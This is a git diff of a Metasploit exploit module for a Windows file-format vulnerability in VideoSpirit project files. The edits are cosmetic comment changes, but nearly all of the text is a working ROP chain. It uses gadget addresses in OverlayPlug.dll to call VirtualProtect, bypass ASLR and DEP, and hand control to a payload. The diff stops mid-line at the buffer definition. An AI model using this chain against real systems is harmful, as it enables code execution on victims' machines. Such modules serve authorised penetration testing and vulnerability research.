diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb
index c9d1c346be..e19638264e 100644
--- a/modules/exploits/windows/fileformat/videospirit_visprj.rb
+++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'Author' =>
 [
- 'Acidgen', #found the vulnerability
+ 'Acidgen', #found the vulnerability
 'corelanc0d3r', #rop exploit + msf module
 ],
 'Version' => '$Revision$',
@@ -113,26 +113,26 @@ class Metasploit3 < Msf::Exploit::Remote # one non-ASLR module is enough for generic ASLR & DEP bypass ! # pvefindaddr rop 'n roll # First, grab VirtualProtect ptr - 0x10065292, # POP EAX # RETN [Module : OverlayPlug.dll] ** - 0x106F4244, # IAT entry + offsqet (bad char friendly) - 0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] ** - 0xEFEFEFF0, # bye bye offset - 0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] ** - 0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [Module : OverlayPlug.dll] ** + 0x10065292, # POP EAX # RETN [OverlayPlug.dll] + 0x106F4244, # IAT entry + offsqet (bad char friendly) + 0x10019762, # POP EBP # RETN [OverlayPlug.dll] + 0xEFEFEFF0, # bye bye offset + 0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll] + 0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Module : OverlayPlug.dll] ** - 0x10016A56, # XCHG EAX,ESI [Module : OverlayPlug.dll] ** + 0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [OverlayPlug.dll] + 0x10016A56, # XCHG EAX,ESI [OverlayPlug.dll] # set size - 0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] ** - 0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :) - 0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] ** - 0xEFEFEFF0, # boo - 0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] ** - 0x10053E4C, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] ** - 0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [Module : OverlayPlug.dll] ** + 0x100A9274, # POP EAX # RETN [OverlayPlug.dll] + 0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :) + 0x10019762, # POP EBP # RETN [OverlayPlug.dll] + 0xEFEFEFF0, # boo + 0x10084977, # ADD EBP,EAX # RETN 
[OverlayPlug.dll] + 0x10053E4C, # XCHG EAX,EBP # RETN [OverlayPlug.dll] + 0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, 
@@ -155,38 +155,38 @@ class Metasploit3 < Msf::Exploit::Remote rand_text_alphanumeric(4).unpack("L")[0].to_i, # set NewProtect to 0x40 - 0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [Module : OverlayPlug.dll] ** + 0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** + 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** + 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** + 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** + 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [Module : OverlayPlug.dll] ** + 0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, # write pOldProtect to .data section - 0x1001AB51, # POP ECX # RETN [Module : OverlayPlug.dll] ** + 0x1001AB51, # POP ECX # RETN [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, 0x10117030, # RW # EDI : ROP NOP - 0x10057090, # POP EDI # RETN [Module : OverlayPlug.dll] ** + 0x10057090, # POP EDI # RETN [OverlayPlug.dll] 0x10057091, # ROP NOP # pReturn2Payload - 0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI 
# RETN [Module : OverlayPlug.dll] ** - 0x10016A56, # XCHG EAX,ESI # RETN [Module : OverlayPlug.dll] ** - 0x1003C946, # ADD EAX,0A # RETN [Module : OverlayPlug.dll] + 0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [OverlayPlug.dll] + 0x10016A56, # XCHG EAX,ESI # RETN [OverlayPlug.dll] + 0x1003C946, # ADD EAX,0A # RETN [OverlayPlug.dll] 0x1003C946, 0x1003C946, 0x1003C946, @@ -206,23 +206,23 @@ class Metasploit3 < Msf::Exploit::Remote 0x1003C946, 0x1003C946, 0x1003C946, - 0x1001FDBD, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] ** + 0x1001FDBD, # XCHG EAX,EBP # RETN [OverlayPlug.dll] - 0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] ** + 0x100A9274, # POP EAX # RETN [OverlayPlug.dll] 0x41414141, # go - 0x10066F84, # PUSHAD # RETN [Module : OverlayPlug.dll] ** + 0x10066F84, # PUSHAD # RETN [OverlayPlug.dll] ].pack("V*") - buffer = "